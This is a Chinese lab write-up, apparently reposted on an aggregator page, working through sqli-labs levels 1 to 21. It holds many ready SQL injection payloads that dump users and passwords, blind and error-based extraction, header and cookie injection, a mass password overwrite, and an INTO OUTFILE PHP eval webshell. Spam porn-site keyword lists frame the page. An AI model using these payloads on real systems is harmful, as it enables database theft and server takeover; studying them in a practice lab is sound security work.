日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

[NOTE] sqli-labs Basic Challenges

發(fā)布時(shí)間:2024/4/18 编程问答 41 豆豆
生活随笔 收集整理的這篇文章主要介紹了 [NOTE] sqli-labs Basic Challenges 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

[NOTE] sqli-labs Basic Challenges

文章目錄

  • [NOTE] sqli-labs Basic Challenges
    • 前言
    • Less-1: GET-Error based-Single quotes–String
    • Less-2: GET-Error based-Intiger based
    • Less-3: GET-Error based-Single quotes with twist-String
    • Less-4: GET-Error based-Double Quotes-String
    • Less-5: GET-Double Injection-Single Quotes-String
    • Less-6: GET-Double Injection-Double Quotes-String
    • Less-7: GET-Dump into outfile-String
    • Less-8: GET-Blind-Boolian Based-Single Quotes
    • Less-9: GET-Blind-Time based-Single Quotes
    • Less-10: GET-Blind-Time based-double quotes
    • Less-11: POST-Error Based-Single quotes-String
    • Less-12: POST-Error Based-Double quotes-String-with twist
    • Less-13: POST-Double Injection-Single quotes-String-with twist
    • Less-14: POST-Double Injection-Single quotes-String-with twist
    • Less-15: POST-Blind-Boolian/time Based-Single quotes
    • Less-16: POST-Blind-Boolian/Time Based-Double quotes
    • Less-17: POST-Update Query-Error Based-String
      • updatexml()注入
    • Less-18: POST-Header Injection-Uagent field-Error based
      • extractvalue()注入
    • Less-19: POST-Header Injection-Referer field-Error based
    • Less-20: POST-Cookie injections-Uagent field-Error based
    • Less-21: POST-Dump into outfile-String

前言

針對(duì)sqli-labs靶場的做題筆記

環(huán)境
虛擬機(jī)環(huán)境
攻擊機(jī):kali 10.10.10.1
靶機(jī):ubuntu 10.10.10.2 小皮面板搭建Web服務(wù)

Less-1: GET-Error based-Single quotes–String

提示輸入數(shù)字參數(shù)id
正常輸入1,我是個(gè)dumb
輸入',報(bào)錯(cuò)了,順便知道用了limit 0,1限制輸出
輸入?id=' or '1'='1,回顯dumb,字符型注入
?id=1' order by 3 %23,得出字段數(shù)為3
?id=' union select 1,2,3 %23,得到回顯第2、3個(gè)字段:

然后就可以對(duì)第2、3個(gè)字段進(jìn)行修改,提取我們感興趣的信息

?id=’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
提取當(dāng)前數(shù)據(jù)庫中的所有表名

?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' %23
提取users表中的所有字段名

?id=' union select 1,group_concat(username),group_concat(password) from users %23
提取users表中的所有用戶名和對(duì)應(yīng)的密碼

Less-2: GET-Error based-Intiger based

和Less-1差不多,只是換成了數(shù)字型注入
信息獲取把id對(duì)應(yīng)的參數(shù)換成不存在的即可

Less-3: GET-Error based-Single quotes with twist-String

正常輸入?id=1,沒啥
輸入?id=’,報(bào)這種錯(cuò):

猜測查詢結(jié)構(gòu)類似為where id = (‘ $XXX ’)
輸入?id=’) or 1=1 %23驗(yàn)證,發(fā)現(xiàn)也回顯正常了
?id=') order by 4 %23報(bào)錯(cuò),得回顯字段數(shù)為3
?id=') union select 1,2,3 %23
下面略

Less-4: GET-Error based-Double Quotes-String

常規(guī)測試
/?id=',什么都沒報(bào)錯(cuò)
/?id=",報(bào)錯(cuò)如下:

/?id=” or 1=1 %23,報(bào)錯(cuò)如下:

/?id=”) or 1=1 %23,正常回顯
猜測查詢結(jié)構(gòu)類似為where id = (“ $XXX ”)

?id=") order by 4 %23

?id=") union select 1,2,3 %23

?id=") union select 1,database(),3 %23

?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

?id=") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'%23

?id=") union select 1,group_concat(username),group_concat(password) from users %23

Less-5: GET-Double Injection-Single Quotes-String

常規(guī)測試
?id=1,顯示“you are in”

?id=99,啥也沒顯示
?id=’

?id=’ or ‘1’=’1

好像和之前的也沒啥區(qū)別?繼續(xù)?id=1’ order by 3 %23,回顯了:

?,繼續(xù)嘗試,得到返回字段數(shù)為3,進(jìn)一步?id=' union select 1,2,3 %23:

繼續(xù)?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

繼續(xù)?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' %23

繼續(xù)?id=' union select 1,group_concat(username),group_concat(password) from users %23

搞定了,What‘s the differences??

上網(wǎng)了解double injection,原來是雙查詢注入
重新嘗試
?id=1' union select 1, concat((select database()), floor(rand(14)*2)) as c, count(*) from information_schema.tables group by c %23
報(bào)錯(cuò)啊啊啊啊啊啊啊
首先是說什么兩個(gè)數(shù)據(jù)庫的字符集不同,然后又說什么

麻了,看多幾遍這兩個(gè)文章當(dāng)會(huì)了得了:
MySQL中Double Injection原理淺析
sqli-labs level5-6 雙查詢注入

Less-6: GET-Double Injection-Double Quotes-String

呃,聽說和Less-5一樣,只是單引號(hào)變成了雙引號(hào)

Less-7: GET-Dump into outfile-String

/?id=1

outfile?啥?
?id=‘

詳細(xì)報(bào)錯(cuò)也沒了
然后發(fā)現(xiàn)不管是單雙引號(hào)加上括號(hào)都不好使了
(其實(shí)是要讓前面為真,然后才跟or)
/?id=1、/?id=1’、/?id=1”
一三可以,二不行,字符型注入(測試不夠全面)
嘗試/?id=1” order by 9 %23,發(fā)現(xiàn)也能顯示you are in,不對(duì)勁
原來存在括號(hào),而且是單引號(hào)包起來的變量,需要探測出來
/?id=1’)),顯示you are in
order by探測字段數(shù):?id=1')) order by 3 %23
?id=')) union select 1,2,3 %23,發(fā)現(xiàn)也只是顯示you are in,看來是不會(huì)在頁面顯示信息了

于是百度dump into outfile
MySQL的outfile函數(shù)用于將查詢結(jié)果寫入到服務(wù)器文件中
因?yàn)樯婕暗皆诜?wù)器上寫入文件,所以上述函數(shù)能否成功執(zhí)行受到參數(shù)secure_file_priv 的影響
然后到靶機(jī)中的my.cnf配置中新增了secure_file_priv=
這樣就可以不限制上傳位置了

?id=1')) union select 1,2,'<?php @eval($_POST["hack"]);?>' into outfile '/www/sqli-labs-master/shell.php' %23
雖然還是會(huì)顯示有語法錯(cuò)誤,但是實(shí)際上已經(jīng)上傳文件了(前提是要有對(duì)目標(biāo)文件夾的寫入權(quán)限(一般/tmp/會(huì)有,這里我臨時(shí)改了/www/的權(quán)限))
然后蟻劍鏈接,只獲得了/www/sqli-labs-master/的權(quán)限

Less-8: GET-Blind-Boolian Based-Single Quotes

基于布爾的盲注
/?id=1行、/?id=1‘不行、/?id=1”行——字符型單引號(hào)注入
/?id=1' order by 4 %23判斷字段數(shù)為3
?id=' union select 1,2,3 %23發(fā)現(xiàn)也只是顯示you are in,盲注

  • 猜解當(dāng)前數(shù)據(jù)庫名長度
    /?id=' or (length(database())=8) %23

  • 猜解數(shù)據(jù)庫名

  • 第一個(gè)字符
    /?id=' or (ascii(substr(database(),1,1))<=90) %23不對(duì)
    /?id=' or (ascii(substr(database(),1,1))<=122) %23對(duì)
    說明第一個(gè)字符為小寫字母(則很有可能全部字符都是小寫字母)
    二分法猜字母
    /?id=' or (ascii(substr(database(),1,1))<=109) %23不對(duì)
    /?id=' or (ascii(substr(database(),1,1))<=115) %23對(duì)
    /?id=' or (ascii(substr(database(),1,1))<=112) %23不對(duì)
    字符為113-115,逐個(gè)試
    /?id=' or (ascii(substr(database(),1,1))=115) %23對(duì)
    第一個(gè)字符為‘s‘

  • 第二個(gè)字符
    基于第一個(gè)字符的經(jīng)驗(yàn),猜測為小寫字母
    /?id=' or (ascii(substr(database(),2,1))<=109) %23對(duì)
    /?id=' or (ascii(substr(database(),2,1))<=103) %23對(duì)
    /?id=' or (ascii(substr(database(),2,1))<=100) %23不對(duì)
    字符為101-103,逐個(gè)試
    /?id=' or (ascii(substr(database(),2,1))=101) %23對(duì)
    第二個(gè)字符為‘e‘

  • 逐步猜解出數(shù)據(jù)庫名為’security’
    驗(yàn)證,/?id=' or (database()='security') %23對(duì)

  • 猜解數(shù)據(jù)庫中表的數(shù)量
    /?id=' or ((select count(table_name) from information_schema.tables where table_schema=database())=3) %23不對(duì)
    /?id=' or ((select count(table_name) from information_schema.tables where table_schema=database())=4) %23對(duì)
    說明當(dāng)前數(shù)據(jù)庫中表的數(shù)量為4
    (其實(shí)不用猜數(shù)據(jù)庫名?)

  • 猜解數(shù)據(jù)庫中表名的長度

  • 第一個(gè)表名長度
    /?id=' or (length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1))=5) %23不對(duì)
    /?id=' or (length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1))=6) %23對(duì)
    說明第一個(gè)表名的長度為6
  • 第二個(gè)表名長度
    /?id=' or (length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1), 1))=7) %23不對(duì)
    /?id=' or (length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1), 1))=8) %23對(duì)
    說明第二個(gè)表名的長度為8
  • 逐步猜解出四個(gè)表的表名長度依次為6、8、7、5(適當(dāng)使用二分法)
  • 猜解數(shù)據(jù)庫中的表名

  • 第一個(gè)表名
    猜表名很可能和數(shù)據(jù)庫名一樣是全小寫
    /?id=' or (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<=109) %23對(duì)
    /?id=' or (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<=103) %23對(duì)
    /?id=' or (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<=100) %23錯(cuò)
    字符為101-103,逐個(gè)試
    /?id=' or (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101) %23對(duì)
    第一個(gè)字符為‘e‘
    /?id=' or (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109) %23對(duì)
    第二個(gè)字符為‘m‘
    逐步猜出第一個(gè)表名為‘emails‘
    或者猜出前兩三個(gè)字符,配合長度為5,可以直接猜是‘emails‘
    驗(yàn)證,/?id=' or ((select table_name from information_schema.tables where table_schema=database() limit 0,1)='emails') %23對(duì)
  • 第二個(gè)表名
    /?id=' or (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114) %23對(duì)
    第一個(gè)字符為‘r’
    /?id=' or (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=101) %23對(duì)
    第二個(gè)字符為‘e’
    逐步猜出第二個(gè)表名為‘referers’
  • 第三個(gè)表名為‘uagents’
  • 第四個(gè)表名為‘users’
  • 猜解users表的字段數(shù)
    ?id=' or ((select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=3) %23對(duì)
    users有3個(gè)字段

  • 猜解users表每個(gè)字段名的長度
    /?id=' or ((length(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1)))=2) %23對(duì)
    第一個(gè)字段名長2
    /?id=' or ((length(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),1)))=8) %23對(duì)
    第二個(gè)字段名長8
    逐步猜解三個(gè)字段名依次長2、8、8

  • 猜解users表的每個(gè)字段名

  • 第一個(gè)字段名
    /?id=' or (ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1))=105) %23對(duì)
    第一個(gè)字符為‘i’
    完整名字是‘id’
  • 第二個(gè)字段名
    /?id=' or (ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),1,1))=112) %23對(duì)
    第一個(gè)字符為‘p’
    第二個(gè)字符為‘a(chǎn)’
    結(jié)合長度為8,表名為‘users’,猜測為‘password’
    驗(yàn)證,/?id=' or ((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1)='password') %23對(duì)
  • 第三個(gè)字段名為‘username’
  • 猜解username字段中值的數(shù)量
    /?id=' or ((select count(username) from users)=13) %23對(duì)
    有13個(gè)用戶

  • 猜解最后一個(gè)用戶名的長度
    /?id=' or (length(substr((select username from users limit 12,1),1))=6) %23對(duì)
    最后一個(gè)用戶名長6

  • 猜解最后一個(gè)用戶名
    這里需要注意的是,不要默認(rèn)是全小寫了,因?yàn)槭怯脩裘?#xff0c;首字母大寫或者是數(shù)字或者是別的情況都有可能
    /?id=' or ((ascii(substr((select username from users limit 12,1),1,1)))=97) %23對(duì)
    第一個(gè)字符為‘a(chǎn)’
    /?id=' or ((ascii(substr((select username from users limit 12,1),2,1)))=100) %23對(duì)
    第二個(gè)字符為‘d’
    第三個(gè)字符為‘m’
    第四個(gè)字符為‘i’
    第五個(gè)字符為‘n’
    /?id=' or ((ascii(substr((select username from users limit 12,1),6,1)))=52) %23
    第六個(gè)字符為‘4’
    最后一個(gè)用戶名為‘a(chǎn)dmin4’

  • 最后給出一些直接猜測常用表名、字段名的方法

  • 直接猜表名
    /?id=' or ((select count(*) from information_schema.tables where table_name='users' and table_schema=database())=1) %23對(duì)
    當(dāng)前數(shù)據(jù)庫中存在users表

  • 直接猜字段名
    /?id=' or ((select count(*) from information_schema.columns where column_name='username' and table_name='users')=1) %23
    users表中存在username字段

  • 直接猜字段值
    /?id=' or ((select count(*) from users where username='admin')=1) %23
    users表中存在admin用戶


  • 手工注入真丁8累,跑跑sqlmap爽一下

    爽中爽!!!

    Less-9: GET-Blind-Time based-Single Quotes

    基于時(shí)間的盲注,完全不會(huì),先去學(xué)習(xí)一波
    原來,這時(shí)候的頁面無論給id傳什么值,是對(duì)是錯(cuò)都會(huì)顯示you are in(就等于沒有任何回顯信息),這時(shí)候只能通過時(shí)間延遲來判斷有沒有注入點(diǎn)
    首先是if(condition,A,B)語句,若condition成立,則返回A,否則返回B

    (下面的延時(shí)時(shí)間由于個(gè)人問題設(shè)的很小,實(shí)際效果也會(huì)延時(shí)挺久的)
    首先是判斷注入類型:
    /?id=' or if(1=1,sleep(1),0) %23:回應(yīng)有延時(shí)
    /?id=" or if(1=1,sleep(1),0) %23:回應(yīng)很快
    /?id= or if(1=1,sleep(1),0) %23:回應(yīng)很快
    說明是字符型注入,單引號(hào)
    然后剩下的就和布爾盲注類似,只不過判斷條件放到了if語句中,成立則延時(shí)

  • 判斷數(shù)據(jù)庫名長度
    /?id=' or if((length(database())=7),sleep(1),0) %23,回應(yīng)很快
    /?id=' or if((length(database())=8),sleep(1),0) %23,有延時(shí)
    說明數(shù)據(jù)庫名長度為8個(gè)字符
  • 判斷數(shù)據(jù)庫名第一個(gè)字符
    /?id=' or if((ascii(substr(database(),1,1))=115),0,sleep(0.5)) %23,回應(yīng)很快
    說明第一個(gè)字符為‘s‘
  • 下略

    另外關(guān)于是對(duì)是錯(cuò),什么時(shí)候延時(shí)不要限得太死,例如二分法時(shí)讓錯(cuò)的延時(shí),盡量讓容易出現(xiàn)的情況延時(shí)就好

    Less-10: GET-Blind-Time based-double quotes

    與Less-9類似,也是字符型時(shí)間盲注,只不過是雙引號(hào)
    最后用sqlmap跑跑盲注
    很奇怪,Less-9可以跑,Less-10卻不行

    Less-11: POST-Error Based-Single quotes-String

    POST型,變成了賬號(hào)密碼登錄頁面
    亂輸,我fail了
    輸入‘會(huì)顯示報(bào)錯(cuò)信息:
    check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ and password=’’ LIMIT 0,1’ at line 1

    兩個(gè)都輸1' or 1=1 #,登進(jìn)去了,顯示用戶名和密碼都是dumb
    字符型單引號(hào)布爾注入

    發(fā)現(xiàn)一個(gè)問題,username和password在SQL語句中的判定順序需要確定一下
    例如:
    check the manual that corresponds to your MySQL server version for the right syntax to use near ‘union select 1,2 #’ and password=’’ or union select 1,2 #’ LIMIT 0,1’ at line 1
    是先檢查username的,所以。。。。應(yīng)該把注入回顯放在password字段
    哦,也不是,直接注第一個(gè)字段就行,我是傻逼

    注POST一定要整個(gè)能夠Repeat的,像是BP、控制臺(tái)啥的,不然累死
    針對(duì)第一個(gè)字段的注入結(jié)果:

    Less-12: POST-Error Based-Double quotes-String-with twist

    僅在用戶名字段輸入“,報(bào)錯(cuò):
    check the manual that corresponds to your MySQL server version for the right syntax to use near ‘""") and password=("") LIMIT 0,1’ at line 1
    看來還有括號(hào)
    uname=") or 1=1 #&passwd=&submit=Submit
    完事啦:

    剩下常規(guī)注入即可。。。

    Less-13: POST-Double Injection-Single quotes-String-with twist

    uname='&passwd=&submit=Submit,報(bào)錯(cuò):

    單引號(hào)+括號(hào)
    uname=') or 1=1 #&passwd=&submit=Submit,不對(duì)勁:

    沒有具體字段的回顯,只顯示了正確
    這就盲注了?麻了

    哦哦,不是,是double injection,我是傻逼

    總結(jié)一下雙重注入的適用場景:正確輸入無信息,結(jié)構(gòu)錯(cuò)誤輸入會(huì)報(bào)錯(cuò)
    嘗試上面雙重注入提到的文章的方法
    發(fā)現(xiàn)還是會(huì)有字符集的錯(cuò)誤,吐了

    關(guān)于這題的博文

    Less-14: POST-Double Injection-Single quotes-String-with twist

    同上,單引號(hào)換雙引號(hào)

    Less-15: POST-Blind-Boolian/time Based-Single quotes

    盲注,只有成功、失敗/語法錯(cuò)誤兩種信息,且沒有報(bào)錯(cuò)提示
    判斷出字符型單引號(hào)盲注
    看一遍上面講過的流程,然后sqlmap

    Less-16: POST-Blind-Boolian/Time Based-Double quotes

    同上,單引號(hào)變成了雙引號(hào)+括號(hào)
    sqlmap跑不出?
    試試–level 5 --risk 3最高級(jí)別探測——成啦

    Less-17: POST-Update Query-Error Based-String

    啥玩意,更新注入?
    頁面變成了輸入了“用戶名”和“新密碼”,改密碼的意思嗎?
    而且還有個(gè)“[PASSWORD RESET]”字段顯示
    先試試常規(guī)注入,隨便輸個(gè)雙一,被罵了5555555
    然后試試用戶名admin,密碼欒樹,成功了,說明admin用戶存在,還被我們改了密碼?
    登入到網(wǎng)站后臺(tái),發(fā)現(xiàn)密碼還真被改了
    那么怎么脫褲呢?

    這是MySQL的更新語句,猜測應(yīng)該是類似于下面這種:
    UPDATE table SET pwd='XX′WHEREusername=’XX' WHERE username=’XXWHEREusername=XXX’;
    那我是不是可以產(chǎn)生設(shè)置pwd之后注釋掉后面的語句,把所有用戶的密碼都改成我想要的?
    試試輸入用戶名admin,新密碼輸入123’ #
    登入后臺(tái),發(fā)現(xiàn)還真全被改了:

    這種漏洞應(yīng)該可以用在“找回密碼->設(shè)置新密碼”這種地方

    所以怎么脫褲。。。。沖浪去了
    原來uname字段作足了過濾,無法注入(可能是為了保證更改密碼流程的執(zhí)行)
    只能在passwd字段作注入,可以使用雙重注入updatexml()注入
    passwd='or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#
    下面的就常規(guī)進(jìn)行

    updatexml()注入

    是SQL語法中的函數(shù)
    UPDATEXML(XML_document, XPath_string, new_value)

    參數(shù):

  • XML_document是String格式,為XML文檔對(duì)象的名稱,文中為Doc
  • XPath_string (Xpath格式的字符串) ,用于匹配第一個(gè)參數(shù)中的部分內(nèi)容。(就像使用正則表達(dá)式匹配一個(gè)文本的特定內(nèi)容一樣)
  • new_value,String格式,替換查找到的符合條件的數(shù)據(jù)。
  • 作用:改變文檔中符合條件的節(jié)點(diǎn)

    利用updatexml函數(shù)的報(bào)錯(cuò)機(jī)制進(jìn)行注入,原理就是當(dāng)?shù)诙€(gè)參數(shù)的格式和Xpath的格式不符的時(shí)候,就會(huì)產(chǎn)生報(bào)錯(cuò),我們可以將我們的payload構(gòu)造到第二個(gè)參數(shù)中,讓其隨著報(bào)錯(cuò)信息展示到頁面上

    Less-18: POST-Header Injection-Uagent field-Error based

    請(qǐng)求頭注入?
    發(fā)現(xiàn)首頁還真給出了我的IP信息:

    那就抓包。。。。看了一圈,發(fā)現(xiàn)請(qǐng)求頭那里本身沒有IP信息,要自己加?

    沖浪,發(fā)現(xiàn)有一個(gè)X-Forwarded-For字段,不就是以前偽造是管理員的CTF題嗎?
    試試X-Forwarded-For:127.0.0.1,發(fā)現(xiàn)沒改到。。。。
    那就先試試常規(guī)注入,發(fā)現(xiàn)也都不行
    呃,沖浪

    如果成功登入會(huì)發(fā)現(xiàn)會(huì)會(huì)回顯User Agent信息

    那就猜注入點(diǎn)在請(qǐng)求頭中的User-Agent字段
    這里要求先能正確登入,才能改User-Agent字段注入
    對(duì)應(yīng)現(xiàn)實(shí)中先先注冊(cè)用戶再登錄,再注入
    由于User-Agent字段是會(huì)顯示在登錄成功頁面中的,于是猜測是不是也是先獲取字段內(nèi)容,然后嵌入到顯示語句中?

    開始亂改,輸入單引號(hào):
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘10.10.10.1’, ‘dumb’)’ at line 1
    看來有SQL語句
    輸入’123213:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘123213’, ‘10.10.10.1’, ‘dumb’)’ at line 1
    難道SQL報(bào)錯(cuò)的規(guī)律是從出錯(cuò)的地方一直到語句末尾?
    那這個(gè)很像是插入語句。。。。(好吧其實(shí)我是看過做法了)
    試試1', '123', 'hack') #:
    Your User Agent is: 1’, ‘123’, ‘hack’) #

    沖浪,有如下的payload(updatexml注入):
    ' or updatexml(1, concat(0x7e, (select database()), 0x7e), 1) or '

    爆表:
    ' or updatexml(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x7e), 1) or '

    爆字段:
    ' or updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), 0x7e), 1) or '

    爆內(nèi)容:
    ' or updatexml(1, concat(0x7e, (select group_concat(username) from users), 0x7e), 1) or '
    (注意用updatexml()只能查詢32位,要用substr函數(shù)逐段查詢)
    ' or updatexml(1, concat(0x7e, substr((select group_concat(username) from users), 1, 32), 0x7e), 1) or '
    ' or updatexml(1, concat(0x7e, substr((select group_concat(username) from users), 32, 32), 0x7e), 1) or '
    ' or updatexml(1, concat(0x7e, substr((select group_concat(username) from users), 64, 32), 0x7e), 1) or '

    或者這種payload:
    ' or updatexml(1, concat(0x7e, substr((select group_concat(username) from users), 1, 32), 0x7e), 1), '', '' ) #
    猜出要插入多少段,主動(dòng)閉合,然后最后注釋

    extractvalue()注入

    或者另一種注入:extractvalue注入——與updatexml類似

    extractvalue() :對(duì)XML文檔進(jìn)行查詢的函數(shù)
    語法:extractvalue(目標(biāo)xml文檔,xml路徑)

    爆庫:
    ' or extractvalue(1, concat(0x7e, (select database()), 0x7e)) or '

    爆表:
    ' or extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x7e)) or '
    ' or extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x7e)), '', '')#

    下略

    Less-19: POST-Header Injection-Referer field-Error based

    請(qǐng)求頭注入——Referer字段
    登陸成功后是這種東西:

    Referer字段改成單引號(hào):
    check the manual that corresponds to your MySQL server version for the right syntax to use near ‘10.10.10.1’)’ at line 1
    猜測是上一題的insert,嘗試', '', '')#:
    Column count doesn’t match value count at row 1
    emmm,看來列數(shù)有變。試出這樣子不會(huì)報(bào)錯(cuò):', '')#,看來是插入兩列

    爆庫:
    ' or updatexml(1, concat(0x7e, (select database()), 0x7e), 1), '')#

    爆表:
    ' or updatexml(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x7e), 1), '')#

    爆字段:
    ' or updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), 0x7e), 1), '')#

    爆內(nèi)容(注意使用substr函數(shù)分段查詢):
    ' or updatexml(1, concat(0x7e, substr((select group_concat(username) from users), 32, 32), 0x7e), 1), '')#root

    extractvalue()注入類似:
    ' or extractvalue(1, concat(0x7e, (select database()), 0x7e)) or ', '') #

    下略

    Less-20: POST-Cookie injections-Uagent field-Error based

    cookie注入?User-Agent字段
    亂登錄,好像沒啥
    dumb登錄:

    之后由于cookie值已保存,再次刷新也是這個(gè)頁面
    抓刷新的包,發(fā)現(xiàn)有發(fā)送過去的cookie——Cookie: uname=Dumb
    把uname改成dhakkan,呃,直接給出了對(duì)應(yīng)的內(nèi)容:

    如何利用cookie字段脫褲?
    從傳入名字會(huì)獲取密碼和id來看,猜測是類似于這樣的結(jié)構(gòu):
    select password,id from users where username=$_COOKIE[‘uname’]
    改單引號(hào):
    check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’’ LIMIT 0,1’ at line 1
    改成‘ or 1=1 #,通過,回顯id=1

    剩下的就是常規(guī)注入了
    dumb' order by 3 #
    ' union select 1,2,3 #——回顯3、1字段
    ' union select group_concat(table_name),2,database() from information_schema.tables where table_schema=database() #

    下略

    Less-21: POST-Dump into outfile-String

    大概和Less-7差不多吧,只是GET改POST,吧
    亂登沒結(jié)果
    正確登入的界面和上一題差不多,但是用戶名回顯的是經(jīng)過base64加密后的結(jié)果
    然后試了試常規(guī)地改cookie的uname值為單引號(hào)啥的,發(fā)現(xiàn)不太行
    是不是要傳入base64加密后的cookie值?
    于是傳入base64加密后的單引號(hào):Jw==
    發(fā)現(xiàn)成功報(bào)錯(cuò):
    check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’’) LIMIT 0,1’
    于是傳入') or 1=1 #的base64加密,成功

    下面就是常規(guī)注入了,只不過payload都要經(jīng)過base64加密
    那么Dump into outfile呢?再次復(fù)習(xí)一遍好了
    只不過這里的上傳webshell應(yīng)該也是通過cookie來注入
    試試?id=') union select 1,2,'<?php @eval($_POST["hack"]);?>' into outfile '/www/sqli-labs-master/shell.php' #的base64編碼
    呃:
    Issue with your mysql: The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
    靶機(jī)就要有靶機(jī)的樣子,去關(guān)掉了:MySQL配置文件添加:secure_file_priv=
    再次嘗試上傳,成功(有警告)
    蟻劍連接,成功,但是同樣只有www用戶的權(quán)限

    總結(jié)

    以上是生活随笔為你收集整理的[NOTE] sqli-labs Basic Challenges的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

    欧美做受高潮 | 国产视频一区二区三区在线 | 午夜av不卡 | 国产精品去看片 | 天天综合久久 | 婷婷丁香激情综合 | 日韩精品视频第一页 | 久久精品系列 | 国产精品成久久久久三级 | 天天综合人人 | 国产精品美女在线观看 | 国产乱对白刺激视频在线观看女王 | 字幕网在线观看 | 欧美激情视频一区二区三区 | 日日操操操 | 亚洲精品一区二区精华 | 欧美一区成人 | 丁香久久激情 | 日韩精品一区二区三区三炮视频 | 91香蕉久久| 欧美日韩二区在线 | 国产亚洲精品久久久久久 | 日韩大片免费观看 | 亚洲精品乱码白浆高清久久久久久 | 国产精品久久久久久久av大片 | 成人aaa毛片| 色九色| 激情五月综合网 | 久久久亚洲麻豆日韩精品一区三区 | 中文字幕成人av | 亚洲激情婷婷 | 成人在线电影观看 | 高清在线观看av | 亚洲精品国产精品乱码不99热 | 免费a视频在线 | 中文在线字幕免 | 国产精品99免视看9 国产精品毛片一区视频 | 国产精品成人一区二区三区吃奶 | 日韩在线观看av | www.色的 | 日韩女同av| 成人黄色小视频 | 中文字幕在线观看第二页 | 99视频| 精品女同一区二区三区在线观看 | 亚洲精品久久视频 | 人人干人人搞 | 国产无遮挡又黄又爽馒头漫画 | 狠狠综合久久av | 亚洲精品午夜国产va久久成人 | 国产美女精品视频 | 久久99精品热在线观看 | 在线观看免费版高清版 | 色夜视频| 日本动漫做毛片一区二区 | 超碰人人av | 亚洲精品中文在线观看 | 青青河边草免费观看完整版高清 | 国产精品福利无圣光在线一区 | 久草在线久草在线2 | 国产日韩欧美网站 | 久草网视频 | 精品毛片在线 | 国产日韩精品一区二区在线观看播放 | 婷婷五综合 | 久久久久久中文字幕 | 国产精品综合在线观看 | 99久久夜色精品国产亚洲 | 国产视频一区在线免费观看 | 久久精品久久久久电影 | 又黄又爽又刺激的视频 | 亚洲国产中文字幕在线 | 久久综合精品国产一区二区三区 | 91黄视频在线观看 | 日韩欧美xxx| va视频在线观看 | 中文字幕在线日本 | 精品免费观看视频 | 日韩午夜电影院 | 精品国产免费av | 黄色成人av网址 | 亚洲国产精品va在线看黑人 | 日韩在线看片 | 日韩高清三区 | 欧美视频99 | 99精品视频免费全部在线 | 天天搞天天干 | av在线播放快速免费阴 | 欧洲亚洲国产视频 | 狠狠狠狠干 | 亚洲欧洲精品一区二区精品久久久 | 日韩视频1 | 欧美激情另类文学 | 国产亚洲精品久久久久久大师 | 日韩在线观看第一页 | 欧美人人 | 天天操天天操天天干 | 国产精品欧美日韩在线观看 | 久久av在线播放 | 91看片在线| 超碰97.com | 国产成人一区二区三区久久精品 | 超碰官网 | 日韩乱码在线 | 欧美国产日韩一区二区三区 | 国产在线欧美日韩 | 天天插伊人| 欧美久久久久久久 | 国产成人1区 | 黄色av一区 | 爱色婷婷 | 人人玩人人添人人 | 国产黄色一级片 | 国产 欧美 日韩 | 国内精品久久久久久久97牛牛 | 成人免费观看视频大全 | 看毛片网站 | 国产精品视频免费 | 欧美日韩免费网站 | 久草视频观看 | 一级黄色片在线免费看 | 久久国产精品免费视频 | 欧美视频日韩视频 | 免费网址你懂的 | 一二三精品视频 | 日本公乱妇视频 | 黄色毛片视频免费 | 在线观看成人小视频 | 天天色天天干天天色 | 99久久99久国产黄毛片 | 天天操夜夜看 | 国产精品2018 | 国产自产高清不卡 | 高清免费在线视频 | 欧美国产日韩激情 | 久久综合干 | 91中文字幕在线 | 中文字幕人成不卡一区 | 欧美精品资源 | 99色国产 | 免费中文字幕视频 | 欧美精品第一 | 日韩av中文字幕在线免费观看 | 中文字幕精品www乱入免费视频 | 